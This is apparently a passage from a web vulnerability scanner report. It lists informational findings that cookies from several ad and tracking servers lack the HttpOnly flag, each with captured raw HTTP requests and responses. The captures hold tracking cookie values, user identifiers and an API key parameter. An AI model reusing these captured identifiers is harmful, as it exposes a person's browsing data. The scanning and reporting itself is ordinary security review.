Set-Cookie: id=c60bd0733000097|2703878/1001371/15138,3226301/1106615/15127,3149839/1069411/15111,2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye; path=/; domain=.doubleclick.net; expires=Fri, 08 Feb 2013 14:08:21 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Mon, 13 Jun 2011 17:45:35 GMT
Server: GFE/2.0
Content-Type: text/html

12.8. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307974284**  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307974284**

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307974284**;10,3,181;1920;1200;http%3A_@2F_@2Fmy.yahoo.com_@2F%3B_ylt%3DAtqNTgBHv4UdcezC5xaY6tfTjdIF?click=http://global.ard.yahoo.com/SIG=15lkbuhbo/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307981483/L=bC9ZKmKL8NLm3NorTdAdCxM0rcHW8032GosAA2uT/B=SnIAKmKL5WA-/J=1307974283257435/K=WV.FHM_EsyZAV7OsrCOkmw/A=6304414/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.7522770736832172?click=http://global.ard.yahoo.com/SIG=15lkbuhbo/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307981483/L=bC9ZKmKL8NLm3NorTdAdCxM0rcHW8032GosAA2uT/B=SnIAKmKL5WA-/J=1307974283257435/K=WV.FHM_EsyZAV7OsrCOkmw/A=6304414/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i_34=8:42:26:7:0:43835:1307361203:B2; u=4dce55b134194; i_1=46:1354:804:44:0:44377:1307970673:B2|46:1354:804:44:0:44375:1307967073:B2|46:1354:804:44:0:48594:1307963457:L

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 13 Jun 2011 14:11:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4dce55b134194; expires=Thu, 14-Jul-2011 14:11:25 GMT; path=/
Set-Cookie: i_1=46:1354:269:44:0:44390:1307974285:B2|46:1354:804:44:0:44390:1307974284:B2|46:1354:804:44:0:44377:1307970673:B2; expires=Thu, 14-Jul-2011 14:11:25 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 743

   function wsod_image1354() {
       document.write('<a href="http://global.ard.yahoo.com/SIG=15lkbuhbo/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307981483/L=bC9ZKmKL8NLm3NorTdAdC
...[SNIP]...
12.9. http://ad.yieldmanager.com/imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /imp?_PVID=C73MEWKL8NLm3NorTdAdCwlBrcHW8032GokADnJu&Z=300x250&cb=1307974281991642&x=http%3A%2F%2Fglobal%2Eard%2Eyahoo%2Ecom%2FSIG%3D15niv0lpu%2FM%3D715481%2E14559668%2E14376714%2E13960104%2FD%3Dmy%2FS%3D150001785%3ALREC%2FY%3DYAHOO%2FEXP%3D1307981481%2FL%3DC73MEWKL8NLm3NorTdAdCwlBrcHW8032GokADnJu%2FB%3D8hpRDWKL5M8%2D%2FJ%3D1307974281991642%2FK%3DgRvxSKzfqEbroTIaTR%2Es5w%2FA%3D6273326%2FR%3D0%2F%2A%24&S=14559668&i=1048402&ycg=&yyob=&zip=05672&_salt=2202883256&B=10&u=http%3A%2F%2Fmy.yahoo.com%2Fdarla%2Fmd.php%3Fen%3Dutf-8&r=0 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?_PVID=C73MEWKL8NLm3NorTdAdCwlBrcHW8032GokADnJu&ad_type=iframe&ad_size=300x250&site=1048402&section_code=14559668&cb=1307974281991642&zip=05672&ycg=&yyob=&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15niv0lpu/M=715481.14559668.14376714.13960104/D=my/S=150001785:LREC/Y=YAHOO/EXP=1307981481/L=C73MEWKL8NLm3NorTdAdCwlBrcHW8032GokADnJu/B=8hpRDWKL5M8-/J=1307974281991642/K=gRvxSKzfqEbroTIaTR.s5w/A=6273326/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!!$gD!!E))!#CIx!0Q]c!$mX/!!H<)!?5%!)e-O=!wVd.!!6nX!!?^T!%hMd~~~~~=%3Ve=%@S6M.jTN"; uid=uid=6add2924-95ac-11e0-b4d2-43a277710b2b&_hmacv=1&_salt=4204180274&_keyid=k1&_hmac=44aa44fb7ee602e1c39d69fa3dcf95912e945eeb; pv1="b!!!!'!$([W!(WdF!$Rc1!1mH9!%ei3!!!!$!?5%!)di=9!wVd.!%vS!!$iom!'t56~~~~~=!i98~~!$)FX!!#/o!!L9x!0eaS!%iUa!#a.5!?5%!'kH#8![:Z-!#5k@!'yJf~~~~~~=$Jui~~!!wjV!!#6W!#8='!/noe!#bl)!!!!$!?5%!'k>u7![:Z-!$>',!$FVq~~~~~~=%=]O=*PGYM.jTN!#Jl?!$5*F!$uj6!.#:D!%^Pa!!!!$!?5%!$8Ip,!@Dj0!'jh]~~~~~~~='htp=(g[2!!!(["; bh="b!!!%/!!!?J!!!!)='htq!!(1-!!!!,='htq!!*10!!!!#='hvv!!*lZ!!!!#=$Wj6!!*oY!!!!%='hvv!!,WM!!!!#=$Wj6!!-?2!!!!*='hvv!!..X!!!!'=$L=p!!/GK!!!!,='htq!!/GR!!!!,='htq!!/Ju!!!!$='htq!!/K$!!!!'='htq!!/i,!!!!+='hvv!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2)!!!!!+='hvv!!2*J!!!!#=%=bB!!3ba!!!!%='7bV!!4F0!!!!'='htq!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=$G$l!!J<J!!!!-='htq!!J<K!!!!-='htq!!J<O!!!!+='htq!!J<S!!!!-='htq!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!OgU!!!!+='hvv!!PKh!!!!#=$G$!!!PL)!!!!#=$G$!!!PL`!!!!$=$G$!!!Phu!!!!%='hvv!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!Zwa!!!!*='hvv!!Zwb!!!!%='hvv!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!-='htq!!j,.!!<NC=$G$l!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!kl+!!!!%='hvv!!kl,!!!!%='hvv!!mL?!!!!#=%=pu!!mo!!!!!%='hvv!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!t^6!!!!%=!Tiu!!tjQ!!!!%='hvv!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#+]S!!!!+='hvv!#-B#!!!!#=$G#-!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0Ei!!!!#=$GZg!#0[r!!!!#=#32s!#16I!!<NC=$G$l!#2%T!!!!$=#pxy!#2.i!!!!#=$G$!!#2g8!!!!#=%=bG!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#5(c!!!!#=%H`<!#6f-!!!!#=!iRq!#7(x!!!!#='hvv!#7)S!!!!#='hvv!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#8R^!!!!#=!iRa!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#C@M!!!!#=!iK@!#D![!!!!#=%if4!#D`%!!!!+='htq!#DpD!!!!#=$GZg!#Dri!!!!#=#ytJ!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!+='htq!#MTF!!!!'=%=]S!#MTH!!!!-='htq!#MTI!!!!-='htq!#MTJ!!!!-='htq!#Nyi!!!!#=!eq^!#O29!!!!)='hvv!#O@L!!<NC=$G$l!#O@M!!<NC=$G$l!#O_8!!!!'=$$NV!#Os.!!!!#='hvv!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!#=#T`h!#SV*!!!!+='hvv!#Sq>!!!!#='>m<!#T^F!!!!#=!yv!!#TnE!!!!#='htq!#UDQ!!!!-='htq!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#XF5!!!!#=%=bI!#Z8A!!!!%='hvv!#Z8E!!!!*='hvv!#Zgo!!!!#='hvv!#ZhT!!!!#='hvv!#]%`!!!!$='i$P!#]*j!!!!#=#pxY!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Up!!!!#='htq!#]Uq!!!!#='htq!#]Uy!!!!#='htq!#]Z!!!!!)='hvv!#]Z#!!!!%='hvv!#]w)!!!!+='htq!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^0%!!!!+='hvv!#^d6!!!!$='i$P!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-7!!!!*='hvv!#`-Z!!!!%='htq!#`-[!!!!%='htq!#`cS!!!!#=%id8!#a=6!!!!%='hvv!#a=7!!!!%='hvv!#a=9!!!!%='hvv!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#bBg!!!!#=!iRr!#bTx!!!!#=%if4!#biv!!!!#=!iK0!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8V!!!!)='hvv!#c8X!!!!)='hvv!#c8c!!!!)='hvv!#c8i!!!!)='hvv!#c8m!!!!)='hvv!#c8p!!!!)='hvv!#dCX!!!!%=!c>6!#dWf!!!!#=#mS:!#eDE!!!!#=#[2T!#eSD!!!!(=$_d[!#fBj!!!!*='hvv!#fBk!!!!*='hvv!#fBm!!!!*='hvv!#fBn!!!!*='hvv!#fFG!!!!#=#T_g!#fG)!!!!%='hvv!#fG+!!!!%='hvv!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g/7!!!!+='hvv!#g=r!!!!%='hvv!#gS,!!!!#='i$2!#h.N!!!!#=#M8b!#k[Y!!!!#=#mS:!#n`.!!!!#=$Fss!#nci!!!!#=$_di!#oTw!!!!#=#mS:!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#p]R!!!!#=$Fss!#q+A!!!!#='htq!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#r-[!!!!#=!c8Z!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#slj!!!!#=#T_f!#t<c!!!!#='hvv!#tM)!!!!$=%=]S!#tM*!!!!$=$Ju9!#uQC!!!!+='htq!#uR1!!!!#='hvv!#uR3!!!!%='hvv!#uR7!!!!*='hvv!#uY<!!!!#=!yv$!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#vC^!!!!#='htq!#wYG!!!!#=$GXv!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!#xG5!!!!#=!yuk!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#R7!!!!#='htq!$#X4!!!!#=#%VO!$#yu!!!!+='htq!$$K<!!!!#=#$.g!$$rQ!!!!#='hvv!$'/S!!!!#=#mS:!$'/Y!!!!#=#mS:!$'@Q!!!!%='hvv!$(!P!!!!*='hvv!$(:q!!!!#=$Fss!$(Gt!!!!'=%=]S!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$*hf!!!!%='hvv!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,gE!!!!$=!iQt!$,jw!!!!#=#mS:!$-'0!!!!#='i$,!$-rx!!!!#=$GXw!$.#F!!!!$=#qP5!$._W!!!!#='i+,!$0V+!!!!#='htq"; ih="b!!!!J!'4@g!!!!#=$KA3!)AU6!!!!#='htn!-5BI!!!!$=$J^*!-ru2!!!!#=$K9.!.#:A!!!!#=$L#)!.#:D!!!!#='htp!.`.U!!!!#='htS!/JVV!!!!%='j!9!/[[9!!!!#=$L5r!/noe!!!!$=%=]O!0)2c!!!!#=$Jsh!0QGc!!!!#=$IeW!0Q]c!!!!#=%3V4!0eaS!!!!$=$Jui!19x/!!!!%=$L6>!1@m6!!!!$=%3V#!1UC$!!!!#=$G!=!1e75!!!!#=%3V6!1mH9!!!!#=!i98!1pQ3!!!!#=#32s!1qGe!!!!#=%1p'!23o_!!!!'=$Ks'!2817!!!!#=$L6.!282@!!!!$=$L5n!29j+!!!!6=$LYE!29j-!!!!#=#32k!29j/!!!!7=$LgV!29j6!!!!7=$Lth!2:N8!!!!#=%3UW!2=_P!!!!#=%3Vp!2A@,!!!!#=$Ju6!2GG7!!!!#=$J4M!2N-f!!!!B=$LJ>!2N7y!!!!$=$L=v!2NNL!!!!$=$L6,!2NO)!!!!$=$Ju2!2`+,!!!!#='hw!!2gH2!!!!#='i#o"; vuday1=!!!!#?:rWHV9*LS4M6Eq4M6EqGf(n`NBHr8YZ_?H; BX=edn6q5d6t078b&b=4&s=k0&t=135

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 14:11:24 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0312.rm.bf1
Set-Cookie: ih="b!!!!J!'4@g!!!!#=$KA3!)AU6!!!!#='htn!-5BI!!!!$=$J^*!-ru2!!!!#=$K9.!.#:A!!!!#=$L#)!.#:D!!!!#='htp!.`.U!!!!#='htS!/JVV!!!!(='jNe!/[[9!!!!#=$L5r!/noe!!!!$=%=]O!0)2c!!!!#=$Jsh!0QGc!!!!#=$IeW!0Q]c!!!!#=%3V4!0eaS!!!!$=$Jui!19x/!!!!%=$L6>!1@m6!!!!$=%3V#!1UC$!!!!#=$G!=!1e75!!!!#=%3V6!1mH9!!!!#=!i98!1pQ3!!!!#=#32s!1qGe!!!!#=%1p'!23o_!!!!'=$Ks'!2817!!!!#=$L6.!282@!!!!$=$L5n!29j+!!!!6=$LYE!29j-!!!!#=#32k!29j/!!!!7=$LgV!29j6!!!!7=$Lth!2:N8!!!!#=%3UW!2=_P!!!!#=%3Vp!2A@,!!!!#=$Ju6!2GG7!!!!#=$J4M!2N-f!!!!B=$LJ>!2N7y!!!!$=$L=v!2NNL!!!!$=$L6,!2NO)!!!!$=$Ju2!2`+,!!!!#='hw!!2gH2!!!!#='i#o"; path=/; expires=Wed, 12-Jun-2013 14:11:24 GMT
Set-Cookie: vuday1=!!!!#?:rWHV9*LS4M6Eq4M6EqGf(n`NBHr8YZ_?H; path=/; expires=Tue, 14-Jun-2011 00:00:00 GMT
Set-Cookie: BX=edn6q5d6t078b&b=4&s=k0&t=135; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Mon, 13 Jun 2011 14:11:24 GMT
Pragma: no-cache
Content-Length: 1075
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

document.write('<a target=\"_blank\" href=\"http://ads.bluelithium.com/clk?2,13%3B96b1bf2de3ca647d%3B1308957b5dd,0%3B%3B%3B3821248774,M0EnBUAcGgBetHQAAAAAANDKHQAAAAAAAAAAAAIAAAAAAAAABAACCjKHJgAAAAAA4l
...[SNIP]...
12.10. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PortalServe/?pid=1188614T19920110117205515&cid=1478425&pos=h&redir=http://ad.doubleclick.net/click%3Bh=v8/3b26/3/0/*/v%3B242169367%3B0-0%3B3%3B39555935%3B3454-728/90%3B40388893/40406680/1%3Bu=!category-games|pos-atf|tag-adj|mtype-standard|sz-728x90|tile-2|demo-D|demo-T|demo-5840|demo-2966|demo-2907|demo-2905|demo-2904|demo-1607|demo-1299|demo-850|demo-848|demo-844|demo-827|demo-790|demo-777|demo-775|demo-774%3B~aopt=2/1/c6a3/0%3B~sscs=%3F$CTURL$&time=1|19:19|-5&r=0.015173257561400533&flash=10&server=polRedir HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=075575AC-65DD-4BD6-BEE2-9CADDD88EAC7; PRbu=Eo1TOtJ24; PRvt=CFJZfEo8h4CIqb!BVBBeJraEo5HX15xKAfDBCeJozEpECIv30c!BdBBeJujEo9GZf8jc!LQBEeJwvEpZYTFEeMAI_BAe; PRgo=BBBAAuILCBVCFUE6C.BZm.!B!B; PRimp=96A50400-1413-8C47-0309-C2F0023E0100; PRca=|AKYt*1093:1|AKRf*443:19|AKTh*396:1|AKKy*396:1|AKZ2*74:1|AKWd*1774:1|AKVe*981:1|AKQh*130:27|AKVX*396:1|AKTY*34573:2|AKKi*16228:2|AKAt*1646:2|#; PRcp=|AKYtAARd:1|AKRfAAHJ:19|AKThAAGY:1|AKKyAAGY:1|AKZ2AABM:1|AKQhAGKI:5|AKWdAA2c:1|AKVeAAPp:1|AKQhAACG:22|AKVXAAGY:1|AKTYAIzd:2|AKKiAENk:2|AKAtAA08:2|#; PRpl=|F5NJ:1|F9VY:19|FX36:1|F2V4:1|FYoZ:2|FYo0:2|F5QS:1|FYoV:1|F10u:1|F2ym:1|FYnn:5|FYnm:10|FYnl:7|FY5B:1|F0tY:1|F0tZ:1|FQvS:2|FB4h:2|#; PRcr=|GOLI:1|GKRu:19|GLnt:1|GMuF:1|GK5Q:1|GOWw:1|GMWF:1|GNEj:1|GMEm:1|GK5V:2|GK5Z:2|GK5W:1|GMEn:2|GMEb:1|GMEa:2|GK5Y:3|GK5P:2|GMEZ:10|GMFk:1|GMyK:1|GMSZ:1|GKiO:2|GBnW:2|#; PRpc=|F5NJGOLI:1|F9VYGKRu:19|FX36GLnt:1|F2V4GMuF:1|FYo0GK5Q:1|FYoZGMEZ:2|FYo0GK5Z:1|F5QSGOWw:1|FYoVGMEZ:1|F10uGMWF:1|F2ymGNEj:1|FYnmGMEm:1|FYnmGK5V:2|FYnnGK5Z:1|FYnnGK5W:1|FYnnGMEn:2|FYnnGMEb:1|FYnmGMEa:2|FYnmGK5Y:3|FYnmGK5P:2|FYnlGMEZ:7|FY5BGMFk:1|F0tYGMyK:1|F0tZGMSZ:1|FQvSGKiO:2|FB4hGBnW:2|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 14 Jun 2011 00:19:16 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 7965
Set-Cookie:PRgo=BBBAAuILCBVCFUE6C.BZm.!B!B;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=A0A50400-79FC-2CEB-0209-123004DD0100; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AJfR*19:2|AKYt*1093:1|AKRf*443:19|AKTh*396:1|AKKy*396:1|AKZ2*74:1|AKWd*1774:1|AKVe*981:1|AKQh*130:27|AKVX*396:1|AKTY*34573:2|AKKi*16228:2|AKAt*1646:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AJfRAAAT:2|AKYtAARd:1|AKRfAAHJ:19|AKThAAGY:1|AKKyAAGY:1|AKZ2AABM:1|AKQhAGKI:5|AKWdAA2c:1|AKVeAAPp:1|AKQhAACG:22|AKVXAAGY:1|AKTYAIzd:2|AKKiAENk:2|AKAtAA08:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|EzNM:2|F5NJ:1|F9VY:19|FX36:1|F2V4:1|FYoZ:2|FYo0:2|F5QS:1|FYoV:1|F10u:1|F2ym:1|FYnn:5|FYnm:10|FYnl:7|FY5B:1|F0tY:1|F0tZ:1|FQvS:2|FB4h:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GMb9:2|GOLI:1|GKRu:19|GLnt:1|GMuF:1|GK5Q:1|GOWw:1|GMWF:1|GNEj:1|GMEm:1|GK5V:2|GK5Z:2|GK5W:1|GMEn:2|GMEb:1|GMEa:2|GK5Y:3|GK5P:2|GMEZ:10|GMFk:1|GMyK:1|GMSZ:1|GKiO:2|GBnW:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|EzNMGMb9:2|F5NJGOLI:1|F9VYGKRu:19|FX36GLnt:1|F2V4GMuF:1|FYo0GK5Q:1|FYoZGMEZ:2|FYo0GK5Z:1|F5QSGOWw:1|FYoVGMEZ:1|F10uGMWF:1|F2ymGNEj:1|FYnmGMEm:1|FYnmGK5V:2|FYnnGK5Z:1|FYnnGK5W:1|FYnnGMEn:2|FYnnGMEb:1|FYnmGMEa:2|FYnmGK5Y:3|FYnmGK5P:2|FYnlGMEZ:7|FY5BGMFk:1|F0tYGMyK:1|F0tZGMSZ:1|FQvSGKiO:2|FB4hGBnW:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

<script language='javascript' src='http://spd.pointroll.com/PointRoll/Ads/prWriteCode.js'></script><script language='javascript'>var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=functi
...[SNIP]...
12.11. http://api.bizographics.com/v1/profile.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoData&api_key=r9t72482usanbp6sphprhvun HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoNetworkPartnerIndex=3; BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe1h0yfLwyxARVExkNK7HUtFp4B4dlWpgdhb8ERjlseVzj8l3ZY0x538DagN4siiD1aaCmzSiiJQK8lykQMu396nckTo4nxwoHo0CoRZSiif2tsuiicEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjv3LIcisLQsnJDisGQdUK2D6ztJRFsRyXovJAo8OukxqBLBWr1XIQIIGVWAglyTqlNGtBiitkUr3XlAiscQyzlKxEyj6p6QYsvgf51m9Da6XiirwxBVxp0nP77W3oMweEdXU6bnuSFykW54FN6yii1oRyCQGqk84Nzl6iivmHYAZUugJ8wSyDpwAsYYmSo3LDnHii2Cip8QnOcWG7PlEjokDX1b7LIGtQieie

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Date: Tue, 14 Jun 2011 00:13:55 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Set-Cookie: BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZ